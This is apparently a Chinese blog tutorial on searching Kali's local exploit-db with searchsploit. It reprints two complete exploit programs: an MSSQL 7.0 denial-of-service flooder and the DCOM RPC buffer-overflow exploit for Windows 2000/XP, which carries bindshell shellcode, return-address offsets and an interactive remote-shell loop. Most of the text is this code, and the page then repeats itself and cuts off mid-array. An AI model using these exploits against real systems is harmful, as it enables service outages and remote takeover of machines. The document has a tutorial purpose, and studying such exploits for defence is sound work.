如何使用kali的Searchsploit查找软件漏洞

摘要

Searchsploit

Searchsploit会通过本地的exploit-db, 查找软件漏洞信息

打开kali的命令行, 输入:

 searchsploit 

查看系统帮助

如何使用kali的Searchsploit查找软件漏洞

查找mssql的漏洞

如果要查找 mssql的漏洞, 命令如下, 会找到所有和mssql相关的漏洞信息, 后面还有相关的漏洞描述信息:

 searchsploit mssql 

如何使用kali的Searchsploit查找软件漏洞

要看相关的漏洞描述, 如果要看mysql7.0的远程DOS漏洞 , 把漏洞描述后面的路径用编辑器打开即可:

 leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c 

文本文件里面的内容为漏洞说明文件和漏洞利用文件:

   /* Microsoft mssql 7.0 server is vulnerable to denial of service attack * By sending a large buffer with specified data an attacker can stop the service * "mssqlserver" the error noticed is different according to services' pack but the result is always * the same one. * Exception Codes = c0000005 * vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3 * This code is for educational purposes, I am not responsible for your acts * Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */  #include <stdio.h> #include <winsock.h>  #pragma comment(lib,"ws2_32") u_long resolv(char*);   void main(int argc, char **argv) { WSADATA WinsockData; SOCKET s; int i; struct sockaddr_in vulh; char buffer[700000]; for(i=0;i<700000;i+=16)memcpy(buffer+i,"/x10/x00/x00/x10/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc",16);   if (argc!=3) { printf(" MSSQL denial of service/n"); printf(" by securma massine/n"); printf("Cet outil a ete cree pour test ,je ne suis en aucun cas responsable des degats que vous pouvez en faire/n"); printf("Syntaxe: MSSQLdos <ip> <port>/n"); exit(1); }  WSAStartup(0x101,&WinsockData); s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  ZeroMemory(&vulh,sizeof(vulh)); vulh.sin_family=AF_INET; vulh.sin_addr.s_addr=resolv(argv[1]); vulh.sin_port=htons(atoi(argv[2])); if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) { printf("Impossible de se connecter...le port est en generale 1433.../n"); exit(1); }  { send(s,buffer,sizeof(buffer),0);  printf("Data envoyes.../n"); } printf("/nattendez quelques secondes et verifiez que le serveur ne repond plus./n"); closesocket(s); WSACleanup(); }   u_long resolv(char *host_name) { struct in_addr addr; struct hostent *host_ent;  if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) { printf ("Erreur DNS : Impossible de résoudre l'adresse %s !!!/n",host_name); exit(1); } CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length); } return addr.s_addr; }  // milw0rm.com [2004-09-29]  View Code

查找和window XP有关的漏洞

 searchsploit /xp 

如何使用kali的Searchsploit查找软件漏洞

查看漏洞利用文件:

 leafpad /usr/share/exploitdb/platforms/./windows/remote/66.c 
  /*   DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code       Written by H D Moore <hdm [at] metasploit.com>       - Usage: ./dcom <Target ID> <Target IP>   - Targets:   -          0    Windows 2000 SP0 (english)   -          1    Windows 2000 SP1 (english)   -          2    Windows 2000 SP2 (english)   -          3    Windows 2000 SP3 (english)   -          4    Windows 2000 SP4 (english)   -          5    Windows XP SP0 (english)   -          6    Windows XP SP1 (english)   */  #include <stdio.h> #include <stdlib.h> #include <error.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h>  unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};  unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00};  unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00};  unsigned char request3[]={ 0x5C,0x00 ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};    unsigned char *targets [] =         {             "Windows 2000 SP0 (english)",             "Windows 2000 SP1 (english)",             "Windows 2000 SP2 (english)",             "Windows 2000 SP3 (english)",             "Windows 2000 SP4 (english)",             "Windows XP SP0 (english)",             "Windows XP SP1 (english)",              NULL                                                                                                };          unsigned long offsets [] =          {             0x77e81674,              0x77e829ec,              0x77e824b5,              0x77e8367a,              0x77f92a9b,              0x77e9afe3,             0x77e626ba,         };  unsigned char sc[]=     "/x46/x00/x58/x00/x4E/x00/x42/x00/x46/x00/x58/x00"     "/x46/x00/x58/x00/x4E/x00/x42/x00/x46/x00/x58/x00/x46/x00/x58/x00"     "/x46/x00/x58/x00/x46/x00/x58/x00"      "/xff/xff/xff/xff" /* return address */          "/xcc/xe0/xfd/x7f" /* primary thread data block */     "/xcc/xe0/xfd/x7f" /* primary thread data block */      /* port 4444 bindshell */     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/xeb/x19/x5e/x31/xc9/x81/xe9/x89/xff"     "/xff/xff/x81/x36/x80/xbf/x32/x94/x81/xee/xfc/xff/xff/xff/xe2/xf2"     "/xeb/x05/xe8/xe2/xff/xff/xff/x03/x53/x06/x1f/x74/x57/x75/x95/x80"     "/xbf/xbb/x92/x7f/x89/x5a/x1a/xce/xb1/xde/x7c/xe1/xbe/x32/x94/x09"     "/xf9/x3a/x6b/xb6/xd7/x9f/x4d/x85/x71/xda/xc6/x81/xbf/x32/x1d/xc6"     "/xb3/x5a/xf8/xec/xbf/x32/xfc/xb3/x8d/x1c/xf0/xe8/xc8/x41/xa6/xdf"     "/xeb/xcd/xc2/x88/x36/x74/x90/x7f/x89/x5a/xe6/x7e/x0c/x24/x7c/xad"     "/xbe/x32/x94/x09/xf9/x22/x6b/xb6/xd7/x4c/x4c/x62/xcc/xda/x8a/x81"     "/xbf/x32/x1d/xc6/xab/xcd/xe2/x84/xd7/xf9/x79/x7c/x84/xda/x9a/x81"     "/xbf/x32/x1d/xc6/xa7/xcd/xe2/x84/xd7/xeb/x9d/x75/x12/xda/x6a/x80"     "/xbf/x32/x1d/xc6/xa3/xcd/xe2/x84/xd7/x96/x8e/xf0/x78/xda/x7a/x80"     "/xbf/x32/x1d/xc6/x9f/xcd/xe2/x84/xd7/x96/x39/xae/x56/xda/x4a/x80"     "/xbf/x32/x1d/xc6/x9b/xcd/xe2/x84/xd7/xd7/xdd/x06/xf6/xda/x5a/x80"     "/xbf/x32/x1d/xc6/x97/xcd/xe2/x84/xd7/xd5/xed/x46/xc6/xda/x2a/x80"     "/xbf/x32/x1d/xc6/x93/x01/x6b/x01/x53/xa2/x95/x80/xbf/x66/xfc/x81"     "/xbe/x32/x94/x7f/xe9/x2a/xc4/xd0/xef/x62/xd4/xd0/xff/x62/x6b/xd6"     "/xa3/xb9/x4c/xd7/xe8/x5a/x96/x80/xae/x6e/x1f/x4c/xd5/x24/xc5/xd3"     "/x40/x64/xb4/xd7/xec/xcd/xc2/xa4/xe8/x63/xc7/x7f/xe9/x1a/x1f/x50"     "/xd7/x57/xec/xe5/xbf/x5a/xf7/xed/xdb/x1c/x1d/xe6/x8f/xb1/x78/xd4"     "/x32/x0e/xb0/xb3/x7f/x01/x5d/x03/x7e/x27/x3f/x62/x42/xf4/xd0/xa4"     "/xaf/x76/x6a/xc4/x9b/x0f/x1d/xd4/x9b/x7a/x1d/xd4/x9b/x7e/x1d/xd4"     "/x9b/x62/x19/xc4/x9b/x22/xc0/xd0/xee/x63/xc5/xea/xbe/x63/xc5/x7f"     "/xc9/x02/xc5/x7f/xe9/x22/x1f/x4c/xd5/xcd/x6b/xb1/x40/x64/x98/x0b"     "/x77/x65/x6b/xd6/x93/xcd/xc2/x94/xea/x64/xf0/x21/x8f/x32/x94/x80"     "/x3a/xf2/xec/x8c/x34/x72/x98/x0b/xcf/x2e/x39/x0b/xd7/x3a/x7f/x89"     "/x34/x72/xa0/x0b/x17/x8a/x94/x80/xbf/xb9/x51/xde/xe2/xf0/x90/x80"     "/xec/x67/xc2/xd7/x34/x5e/xb0/x98/x34/x77/xa8/x0b/xeb/x37/xec/x83"     "/x6a/xb9/xde/x98/x34/x68/xb4/x83/x62/xd1/xa6/xc9/x34/x06/x1f/x83"     "/x4a/x01/x6b/x7c/x8c/xf2/x38/xba/x7b/x46/x93/x41/x70/x3f/x97/x78"     "/x54/xc0/xaf/xfc/x9b/x26/xe1/x61/x34/x68/xb0/x83/x62/x54/x1f/x8c"     "/xf4/xb9/xce/x9c/xbc/xef/x1f/x84/x34/x31/x51/x6b/xbd/x01/x54/x0b"     "/x6a/x6d/xca/xdd/xe4/xf0/x90/x80/x2f/xa2/x04";       unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };   /* ripped from TESO code */ void shell (int sock) {         int     l;         char    buf[512];         fd_set  rfds;           while (1) {                 FD_SET (0, &rfds);                 FD_SET (sock, &rfds);                  select (sock + 1, &rfds, NULL, NULL, NULL);                 if (FD_ISSET (0, &rfds)) {                         l = read (0, buf, sizeof (buf));                         if (l <= 0) {                                 printf("/n - Connection closed by local user/n");                                 exit (EXIT_FAILURE);                         }                         write (sock, buf, l);                 }                  if (FD_ISSET (sock, &rfds)) {                         l = read (sock, buf, sizeof (buf));                         if (l == 0) {                                 printf ("/n - Connection closed by remote host./n");                                 exit (EXIT_FAILURE);                         } else if (l < 0) {                                 printf ("/n - Read failure/n");                                 exit (EXIT_FAILURE);                         }                         write (1, buf, l);                 }         } }   int main(int argc, char **argv) {          int sock;     int len,len1;     unsigned int target_id;     unsigned long ret;     struct sockaddr_in target_ip;     unsigned short port = 135;     unsigned char buf1[0x1000];     unsigned char buf2[0x1000];      printf("---------------------------------------------------------/n");     printf("- Remote DCOM RPC Buffer Overflow Exploit/n");     printf("- Original code by FlashSky and Benjurry/n");     printf("- Rewritten by HDM <hdm [at] metasploit.com>/n");       if(argc<3)     {         printf("- Usage: %s <Target ID> <Target IP>/n", argv[0]);         printf("- Targets:/n");         for (len=0; targets[len] != NULL; len++)         {             printf("-          %d/t%s/n", len, targets[len]);            }         printf("/n");         exit(1);     }       /* yeah, get over it :) */     target_id = atoi(argv[1]);     ret = offsets[target_id];          printf("- Using return address of 0x%.8x/n", ret);      memcpy(sc+36, (unsigned char *) &ret, 4);      target_ip.sin_family = AF_INET;     target_ip.sin_addr.s_addr = inet_addr(argv[2]);     target_ip.sin_port = htons(port);      if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)     {         perror("- Socket");         return(0);     }          if(connect(sock,(struct sockaddr *)⌖_ip, sizeof(target_ip)) != 0)     {         perror("- Connect");         return(0);     }          len=sizeof(sc);     memcpy(buf2,request1,sizeof(request1));     len1=sizeof(request1);          *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;       *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;          memcpy(buf2+len1,request2,sizeof(request2));     len1=len1+sizeof(request2);     memcpy(buf2+len1,sc,sizeof(sc));     len1=len1+sizeof(sc);     memcpy(buf2+len1,request3,sizeof(request3));     len1=len1+sizeof(request3);     memcpy(buf2+len1,request4,sizeof(request4));     len1=len1+sizeof(request4);          *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;           *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;       *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;          if (send(sock,bindstr,sizeof(bindstr),0)== -1)     {             perror("- Send");             return(0);     }     len=recv(sock, buf1, 1000, 0);          if (send(sock,buf2,len1,0)== -1)     {             perror("- Send");             return(0);     }     close(sock);     sleep(1);          target_ip.sin_family = AF_INET;     target_ip.sin_addr.s_addr = inet_addr(argv[2]);     target_ip.sin_port = htons(4444);      if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)     {         perror("- Socket");         return(0);     }          if(connect(sock,(struct sockaddr *)⌖_ip, sizeof(target_ip)) != 0)     {         printf("- Exploit appeared to have failed./n");         return(0);     }            printf("- Dropping to System Shell.../n/n");      shell(sock);          return(0); }  // milw0rm.com [2003-07-26]  View Code

查找apple的漏洞

 searchsploit apple 

如何使用kali的Searchsploit查找软件漏洞

作者: NONO

出处: http://www.cnblogs.com/diligenceday/

QQ: 287101329

微信:

18101055830

Searchsploit

Searchsploit会通过本地的exploit-db, 查找软件漏洞信息

打开kali的命令行, 输入:

 searchsploit 

查看系统帮助

如何使用kali的Searchsploit查找软件漏洞

查找mssql的漏洞

如果要查找 mssql的漏洞, 命令如下, 会找到所有和mssql相关的漏洞信息, 后面还有相关的漏洞描述信息:

 searchsploit mssql 

如何使用kali的Searchsploit查找软件漏洞

要看相关的漏洞描述, 如果要看mysql7.0的远程DOS漏洞 , 把漏洞描述后面的路径用编辑器打开即可:

 leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c 

文本文件里面的内容为漏洞说明文件和漏洞利用文件:

   /* Microsoft mssql 7.0 server is vulnerable to denial of service attack * By sending a large buffer with specified data an attacker can stop the service * "mssqlserver" the error noticed is different according to services' pack but the result is always * the same one. * Exception Codes = c0000005 * vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3 * This code is for educational purposes, I am not responsible for your acts * Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */  #include <stdio.h> #include <winsock.h>  #pragma comment(lib,"ws2_32") u_long resolv(char*);   void main(int argc, char **argv) { WSADATA WinsockData; SOCKET s; int i; struct sockaddr_in vulh; char buffer[700000]; for(i=0;i<700000;i+=16)memcpy(buffer+i,"/x10/x00/x00/x10/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc",16);   if (argc!=3) { printf(" MSSQL denial of service/n"); printf(" by securma massine/n"); printf("Cet outil a ete cree pour test ,je ne suis en aucun cas responsable des degats que vous pouvez en faire/n"); printf("Syntaxe: MSSQLdos <ip> <port>/n"); exit(1); }  WSAStartup(0x101,&WinsockData); s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  ZeroMemory(&vulh,sizeof(vulh)); vulh.sin_family=AF_INET; vulh.sin_addr.s_addr=resolv(argv[1]); vulh.sin_port=htons(atoi(argv[2])); if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) { printf("Impossible de se connecter...le port est en generale 1433.../n"); exit(1); }  { send(s,buffer,sizeof(buffer),0);  printf("Data envoyes.../n"); } printf("/nattendez quelques secondes et verifiez que le serveur ne repond plus./n"); closesocket(s); WSACleanup(); }   u_long resolv(char *host_name) { struct in_addr addr; struct hostent *host_ent;  if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) { printf ("Erreur DNS : Impossible de résoudre l'adresse %s !!!/n",host_name); exit(1); } CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length); } return addr.s_addr; }  // milw0rm.com [2004-09-29]  View Code

查找和window XP有关的漏洞

 searchsploit /xp 

如何使用kali的Searchsploit查找软件漏洞

查看漏洞利用文件:

 leafpad /usr/share/exploitdb/platforms/./windows/remote/66.c 
  /*   DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code       Written by H D Moore <hdm [at] metasploit.com>       - Usage: ./dcom <Target ID> <Target IP>   - Targets:   -          0    Windows 2000 SP0 (english)   -          1    Windows 2000 SP1 (english)   -          2    Windows 2000 SP2 (english)   -          3    Windows 2000 SP3 (english)   -          4    Windows 2000 SP4 (english)   -          5    Windows XP SP0 (english)   -          6    Windows XP SP1 (english)   */  #include <stdio.h> #include <stdlib.h> #include <error.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h>  unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};  unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 